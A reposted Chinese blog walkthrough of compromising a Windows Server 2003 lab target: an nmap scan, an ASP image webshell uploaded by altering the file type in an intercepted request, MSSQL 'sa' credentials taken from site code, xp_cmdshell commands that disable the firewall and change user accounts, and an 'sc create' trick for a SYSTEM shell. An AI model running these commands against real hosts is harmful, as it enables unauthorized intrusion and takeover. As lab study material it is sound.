给某个伙伴展示一次渗透提权
2022-11-27 12:34:31 Author: 白帽子左一(查看原文) 阅读量:17 收藏

扫码领资料

获网安教程

免费&进群

这是一个某个正在学习安全伙伴告诉我,他老师给他一个靶机让他提权,他不知道怎么下手,让我来试一下,那就试一下

知道网段ip没开机密码,他说这个靶机是这样的。

固定ip是 192.168.3.5

是个win2003r2的系统

那就先把虚拟机配置一下

 

加一个192.168.3.0网段的网络

把第一个网络适配器添加上VMnet2这个网络

然后在我的kali虚拟机上也添加VMnet2网卡

开机ifconfig看看

添加上了

然后ping一下看能不能ping通

 能通

用nmap简单扫下服务和端口

好多开放端口

有23端口但是没密码

有445端口用msf搞了一波似乎不行,可能打了补丁

上面有好几个站点, 随便选一个默认密码就进后台了

剩下直接拿shell行了

直接传一张图片马,他后台有个文件改名

通过抓包把文件类型改了,改成图片里面一句话马的执行类型,这个站是asp站,我传的是asp马,所以改的也是asp

ok

链接了上来

传了个msf马上来执行不了,没有权限

提权

尝试通过mssql数据库提权方法

在里面的代码文件找出数据库账号密码

 

账号:sa

密码:admin

看能不能链接

连上了

 

用 exec xp_cmdshell 执行命令

exec sp_configure 'show advanced options',1;

RECONFIGURE;

exec sp_configure 'xp_cmdshell',1;

RECONFIGURE;

 

exec xp_cmdshell 'netsh advfirewall set allprofiles state off';

关闭防火墙

exec xp_cmdshell 'net user';

查看用户

把账户密码改

 

这下能登录进去了

只是administration权限,我需要最高的system权限

用SC提权方法

sc提权只适合老系统,xp win7 2003这些,其他系统有其他方法

sc Create sys binPath="cmd / c start" type= own type= interact

sc start sys

虽然提示失败1053 但是最高权限system窗口弹出来了

 

本文作者:一个路过的小黑转载自:https://www.cnblogs.com/ms0708/p/16747644.html

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”吧


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247590788&idx=1&sn=e18f0832596f18d6c58b7592b1c522bc&chksm=ebeb2aa9dc9ca3bf6c691addce32c0d7552b67577c3305d88a7ae901836e31982683974bee22#rd
如有侵权请联系:admin#unsafe.sh